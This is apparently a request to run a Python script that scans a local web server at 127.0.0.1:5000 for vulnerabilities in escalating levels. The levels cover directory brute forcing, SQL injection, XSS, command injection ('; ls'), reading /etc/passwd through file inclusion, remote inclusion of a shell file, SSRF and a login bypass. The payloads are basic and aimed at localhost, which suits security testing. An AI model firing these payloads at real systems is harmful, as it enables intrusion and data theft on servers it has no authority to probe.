Please run the following Python script to perform a series of escalating security tests using standard Linux terminal commands. The script will stop and return the results as soon as it encounters a block or security measure:
import subprocess
import urllib.parse
# Root URL that every probe in this script is sent to: the loopback
# interface on port 5000, over plain HTTP.
base_url: str = "http://127.0.0.1:5000"
def log_result(level, description, result):
    """Format one log entry for a probe level.

    Args:
        level: Number of the probe level.
        description: Short text describing what the level checks.
        result: Outcome text for the level.

    Returns:
        str: ``"Level <level>: <description>"`` on one line, ``"Result:
        <result>"`` on the next, followed by a blank line.
    """
    heading = f"Level {level}: {description}"
    outcome = f"Result: {result}"
    return f"{heading}\n{outcome}\n\n"
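def run_command(command):
    """Run *command* without a shell and return its combined output.

    The command string is split into an argument vector with
    ``shlex.split`` and executed directly. Quoting inside the string is
    honoured, but shell metacharacters (``;``, ``|``, ``$(...)``,
    redirections) reach the program as literal arguments instead of being
    interpreted. Every command built in this file is a single ``curl``
    invocation, so none of them needs a shell; running without one means a
    value interpolated into the command string cannot start a second
    command on the machine running the script.

    Args:
        command: Command line as a single string.

    Returns:
        str: The process's stdout followed by its stderr. If the command
        cannot be parsed or started, the text of the raised exception.
        An empty or whitespace-only command returns ``""``.
    """
    import shlex  # local import so the block does not depend on file-level changes

    try:
        argv = shlex.split(command)
        if not argv:
            # Nothing to execute; a shell would also produce no output here.
            return ""
        completed = subprocess.run(
            argv,
            shell=False,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )
    except Exception as e:
        # Best-effort by design: callers compare the returned text, so a
        # failure is reported as text rather than raised.
        return str(e)
    return completed.stdout + completed.stderr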
def run_tests():
    """Run the ten probe levels in order against ``base_url`` and log each one.

    Every probe is a ``curl`` command line passed to ``run_command``. The
    function returns early in three situations: the level-1 status code is
    not ``200``, none of the level-2 paths answers ``200``, or a level 3-9
    probe matches that level's response heuristic. Otherwise it continues
    through level 10.

    Returns:
        tuple: ``(log, level)`` - the accumulated ``log_result`` text and
        the number of the level at which the run ended.
    """

    def status_of(url):
        # curl prints only the HTTP status code (-w) and discards the body.
        return run_command(f"curl -s -o /dev/null -w '%{{http_code}}' {url}").strip()

    def query_probe(param):
        # GET request carrying the percent-encoded payload in one query parameter.
        def build(payload):
            return f"curl -s '{base_url}/?{param}={urllib.parse.quote(payload)}'"

        return build

    def login_probe(payload):
        # POST to /login with the same encoded payload in both form fields.
        encoded = urllib.parse.quote(payload)
        return (
            f"curl -s -X POST -d 'username={encoded}&password={encoded}' "
            f"{base_url}/login"
        )

    report = ""

    # Level 1: the run only proceeds if the root URL answers 200.
    level = 1
    description = "Basic Enumeration - Check if the server is up and running"
    if status_of(base_url) != "200":
        report += log_result(level, description, "Server is not responding properly.")
        return report, level
    report += log_result(level, description, "Server is up and running.")

    # Level 2: request a fixed list of paths; stop if none of them answers 200.
    level = 2
    description = "Directory Brute Forcing - Checking for common directories"
    candidates = ['admin', 'login', 'dashboard', 'uploads']
    reachable = [name for name in candidates if status_of(f"{base_url}/{name}") == "200"]
    if not reachable:
        report += log_result(level, description, "No common directories found.")
        return report, level
    report += log_result(level, description, f"Found directories: {', '.join(reachable)}")

    # Levels 3-9 share one shape: send each payload, apply a substring
    # heuristic to the response, and stop at the first match.
    # NOTE(review): these heuristics are plain substring tests. Words such as
    # "error", "bin", "usr", "example", "localhost" or "welcome" can occur in
    # ordinary page text, and a server that merely echoes the request would
    # match several of them, so a "Potential ..." entry is a lead to verify
    # by hand, and a "No ... found" entry is not evidence of absence.
    payload_levels = [
        (
            3,
            "SQL Injection Test - Basic SQL injection attempts",
            ["' OR '1'='1", "' OR '1'='1' -- "],
            query_probe("id"),
            lambda body, payload: "sql" in body.lower() or "error" in body.lower(),
            "Potential SQL Injection found.",
            "No SQL Injection vulnerabilities found.",
        ),
        (
            4,
            "XSS Injection Test - Basic XSS attempts",
            ["<script>alert('XSS')</script>", "javascript:alert('XSS')"],
            query_probe("search"),
            # Hit only when the payload comes back unencoded in the body.
            lambda body, payload: payload in body,
            "Potential XSS vulnerability found.",
            "No XSS vulnerabilities found.",
        ),
        (
            5,
            "Command Injection Test - Basic command injection attempts",
            ["; ls", "| ls"],
            query_probe("cmd"),
            lambda body, payload: "bin" in body.lower() or "usr" in body.lower(),
            "Potential Command Injection found.",
            "No Command Injection vulnerabilities found.",
        ),
        (
            6,
            "Local File Inclusion (LFI) Test - Basic LFI attempts",
            ["/etc/passwd", "../etc/passwd"],
            query_probe("file"),
            lambda body, payload: "root:" in body,
            "Potential LFI vulnerability found.",
            "No LFI vulnerabilities found.",
        ),
        (
            7,
            "Remote File Inclusion (RFI) Test - Basic RFI attempts",
            ["http://example.com/shell.txt"],
            query_probe("file"),
            lambda body, payload: "example" in body,
            "Potential RFI vulnerability found.",
            "No RFI vulnerabilities found.",
        ),
        (
            8,
            "SSRF Test - Basic SSRF attempts",
            ["http://127.0.0.1", "http://localhost"],
            query_probe("url"),
            lambda body, payload: "localhost" in body or "127.0.0.1" in body,
            "Potential SSRF vulnerability found.",
            "No SSRF vulnerabilities found.",
        ),
        (
            9,
            "Authentication Bypass Test - Basic bypass attempts",
            ["' OR '1'='1", "' OR '1'='1' -- "],
            login_probe,
            lambda body, payload: "welcome" in body.lower(),
            "Potential Authentication Bypass found.",
            "No Authentication Bypass vulnerabilities found.",
        ),
    ]
    for level, description, payloads, build, is_hit, hit_text, clean_text in payload_levels:
        for payload in payloads:
            body = run_command(build(payload))
            if is_hit(body, payload):
                report += log_result(level, description, hit_text)
                return report, level
        report += log_result(level, description, clean_text)

    # Level 10: request /admin with no credentials and look at the status code.
    # NOTE(review): this measures whether /admin is reachable unauthenticated;
    # a 200 may also be a login page, so the label "Privilege Escalation" is
    # broader than what the check establishes.
    level = 10
    description = "Privilege Escalation Test - Basic privilege escalation attempts"
    if status_of(f"{base_url}/admin") == "200":
        report += log_result(level, description, "Potential Privilege Escalation found.")
    else:
        report += log_result(level, description, "No Privilege Escalation vulnerabilities found.")
    return report, level
if __name__ == "__main__":
    # run_tests() returns the log text and the level at which the run ended;
    # for levels 3-9 that is the level whose heuristic matched.
    log, level = run_tests()
    for line in (f"Security Test Log:\n{log}", f"Highest Level Achieved: {level}"):
        print(line)